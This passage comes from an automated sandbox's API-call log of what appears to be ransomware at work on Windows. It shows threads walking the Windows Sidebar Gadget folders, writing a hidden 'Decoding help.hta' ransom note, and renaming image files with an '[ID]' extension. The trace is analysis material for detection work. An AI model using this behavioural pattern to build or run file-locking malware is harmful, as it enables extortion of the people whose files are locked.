lpStartAddress=0x4014cc, lpParameter=0x113643d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x554 [0050.239] CloseHandle (hObject=0x554) returned 1 [0050.239] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0ffddc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xcb0ffddc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xcb0ffddc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2732, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.239] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0050.239] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0050.239] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0050.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0x1 [0050.240] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.240] lstrlenW (lpString="icon.png") returned 8 [0050.240] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0050.240] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0050.240] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" [0050.240] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" [0050.240] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.184] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0051.184] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0051.184] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0051.184] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0051.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0051.184] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0051.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images" [0051.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0051.184] GlobalMemoryStatus (in: lpBuffer=0x1c09fd10 | out: lpBuffer=0x1c09fd10) [0051.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10838320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0051.208] CloseHandle (hObject=0x6f0) returned 1 [0051.208] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbad82b5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbad82b5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb3d37fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0051.208] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0051.208] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0051.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0051.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0x1 [0051.208] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0051.208] lstrlenW (lpString="logo.png") returned 8 [0051.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0051.208] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0051.208] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" [0051.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" [0051.209] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0051.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.209] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbad82b5, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbad82b5, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb3d37fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0051.209] FindClose (in: hFindFile=0x5e2cf0 | out: hFindFile=0x5e2cf0) returned 1 Thread: id = 431 os_tid = 0xbb4 [0043.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*", lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cb0 [0045.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.154] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.154] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.154] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf39e8c, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf39e8c, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd379e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3260, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.154] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0045.154] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0045.154] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0045.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0xffffffff [0045.154] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0045.406] WriteFile (in: hFile=0x390, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c1dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c1dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.407] CloseHandle (hObject=0x390) returned 1 [0045.407] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.472] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.472] lstrlenW (lpString="drag.png") returned 8 [0048.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0048.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0048.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" [0048.472] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" [0048.472] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.306] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0049.306] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0049.306] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0049.306] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0049.649] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0049.649] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0049.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US" [0049.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0049.649] GlobalMemoryStatus (in: lpBuffer=0x1c1dfd10 | out: lpBuffer=0x1c1dfd10) [0049.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11639808, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0049.651] CloseHandle (hObject=0x38c) returned 1 [0049.651] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd6739fc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbd6739fc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbd6739fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x32a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0049.651] lstrcpyW (in: lpString1=0x99a2cc0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0049.651] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0049.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0049.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0x1 [0049.651] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0049.651] lstrlenW (lpString="icon.png") returned 8 [0049.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0049.651] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0049.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" [0049.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" [0049.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0049.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.841] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0049.841] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0049.841] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0049.841] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0050.120] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0050.120] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0050.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0050.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0050.120] GlobalMemoryStatus (in: lpBuffer=0x1c1dfd10 | out: lpBuffer=0x1c1dfd10) [0050.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x111fbdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0050.121] CloseHandle (hObject=0x628) returned 1 [0050.121] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbf1ad59c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0050.121] lstrcpyW (in: lpString1=0x10c96810, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows 